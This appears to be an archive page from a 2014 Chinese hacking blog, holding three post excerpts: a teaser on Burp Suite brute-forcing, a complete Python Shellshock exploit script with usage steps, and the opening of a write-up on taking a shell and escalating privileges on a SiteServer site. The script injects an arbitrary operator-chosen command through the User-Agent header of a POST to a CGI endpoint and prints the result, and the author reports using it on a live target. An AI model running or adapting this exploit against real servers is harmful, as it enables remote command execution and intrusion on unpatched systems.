2014年10月

Burp的爆破功能

A.tm.k

2014年10月31日

http://sys7em.info

为什么重新开一个了个单独讲Burp的爆破功能

并不是因为说这个功能很难学
要重新开一个帖子来说。

而是因为我觉得上一篇太长了。再长的话就硬不起来了。 

- 阅读剩余部分 -

Python-Bash漏洞执行脚本

作者: A.tm.k

博客: http://sys7em.info

发布日期: 2014年10月28日

前言:这是我在学习 Python 过程中写的一个使用 Python 来进行 POST 提交数据的漏洞检测脚本。 

此脚本发布测试及学习所用,请勿用与违法行为。 

使用教程: 修改代码中的 "RemoteHost" 为网站地址, “RemoteHostRepose” 为写入的木马回显内容 

然后执行 python bashvule.py 

根据提示输入你要执行的命令 

例子 :

102814_0334_test1.png

执行代码 

102814_0334_test2.png 

回显的 /tmp/ 内容 

102814_0334_test3.png 

写入文件的返回内容,这文件已经被我删掉了,所以看起来是404。 

echo 创建一个就可以了,这就不演示了 

代码段:

#!/usr/bin/env python
#_*_coding:utf−8−*−
'''
Bash Vulne Python Script
'''
import httplib,urllib
import requests
import sys
testcommand = raw_input(" What is Command ? \n ")
postData = urllib.urlencode({'v_recno':20397,'v_curdbno':0})
proxy = {"http":"http://127.0.0.1:8080"}
postHeader = {"Host":"RemoteHost",
	"User-Agent":"() { :;}; echo `"+testcommand+"`",
	"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
	"Origin":"http://127.0.0.1:8086","Content-Type":"application/x-www-form-urlencoded",
	"Accept-Encoding":"gzip,deflate",
	"Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6",
	"Cookie":"ASPSESSIONIDACDRDBQQ=MPNJLCMAGGOHLAMNDBJCEOOA; ASPSESSIONIDCABTCBRQ=LIFHLMLAADCHIJNPJPFGGAIO",
	"Content-Length":"25"}
url = "http://RemoteHost/cgi-bin/DispBibDetail"
conning = requests.post(url,data=postData,headers=postHeader)
url2 = "http://RemoteHostRepose/upload.txt"
conn = requests.get(url2)
print conning.content
print ' '+"#"*10+' '+'Reponse'+' '+"#"*10
print " "+conn.content



实战SiteServer拿shell到提权

 

作者: A.tm.k

博客: http://sys7em.info

发布日期: 2014年10月5日

前言: 这是一个渗透系列中的插曲. 接下来的几篇拿shell的文章也是如此. 

都是属于我在这几天来渗透过程的衍生物.看看就好了. 

这些帖子只是记录一下拿 shell 到提权的姿势, 因为我有些时候会忘记…. 

写下来也方便以后我好找吧.
  

目标: 某二级域名 

环境: SiteServer3.4.5+Win2003+IIS6.0+Access 

参考文章: 获取Siteserver 的管理用户名 Siteserver 的 Cookies欺骗 

- 阅读剩余部分 -